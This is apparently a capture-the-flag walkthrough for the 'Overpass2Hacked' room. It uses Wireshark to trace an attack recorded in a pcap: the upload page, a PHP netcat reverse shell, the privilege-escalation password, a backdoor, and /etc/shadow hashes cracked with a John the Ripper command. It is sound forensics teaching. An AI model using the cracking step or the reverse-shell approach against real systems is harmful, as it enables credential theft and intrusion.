OVERPASS2HACKED — FORENSIC ANALYSIS OF THE PCAP FILE
Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.
Can you work out how the attacker got in, and hack your way back into Overpass’ production server?
Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Linux Fundamentals as a bare minimum.
The above instructions are the requirements for completing the room. The pcap file is provided in the room that one downloads for analysis. The required tool is wireshark, pcap files contain captured network traffic.
This walkthrough only covers the first task of forensics, analyzing the pcap.
Open the pcap file in your preferred way, for me, I just load the graphical image and click on file>open>
Question One
What was the URL of the page they used to upload a reverse shell?
Since the question asks for a URL, it hints that we are looking at http traffic, therefore, one can filter out port 80 or http traffic. I applied the http filter on wireshark and got the page as identified in the image below.
The first packet is a GET request and the second packet is response code 200 OK which means success, i.e. the request was received and is being processed.
Following http stream as follows
The URL is identified as follows
Question Two
What payload did the attacker use to gain access?
To identify the payload, while still looking at traffic on port 80, we try to identify what happened at the /development/ page. We apply a specific filter for this through edit>find packet. Set the value to string.
Looking through various packets identified, one catches my attention.
Following TCP stream, we identify a php script that creates a netcat reverse shell that was used to upload the file payload.php.
Question Three
What password did the attacker use to privesc?
Privesc is a short form for privilege escalation which means gaining rights and privileges that are beyond the intended ones, more like gaining admin rights to a server.
We employ the same search pattern as question three except we search for password in the packet bytes, we see a data file and some clues.
Following TCP stream
Highlighted in blue are all commands ran to identify the user, spawn a stable shell, list all files and directories, read contents of the hidden directory .overpass and check what kind of commands the identified user can run.
Question Four
How did the attacker establish persistence?
The attacker installed a backdoor in the system to maintain persistence as shown below
Question five
Using the fasttrack wordlist, how many of the system passwords were crackable?
When the attacker gained privilege access, they accessed the /etc/shadow file and obtained several hashes as seen below
We add the hashes to a file then download the fasttrack wordlist from github that we’ll use to crack the hashes using a tool called john the ripper.
Run the following command john -- wordlist=yourwordlist passwordhashfile.
Four passwords are cracked as shown above.
This marks the end of task one, forensics.
Malware analysis and attack tasks loading soon!
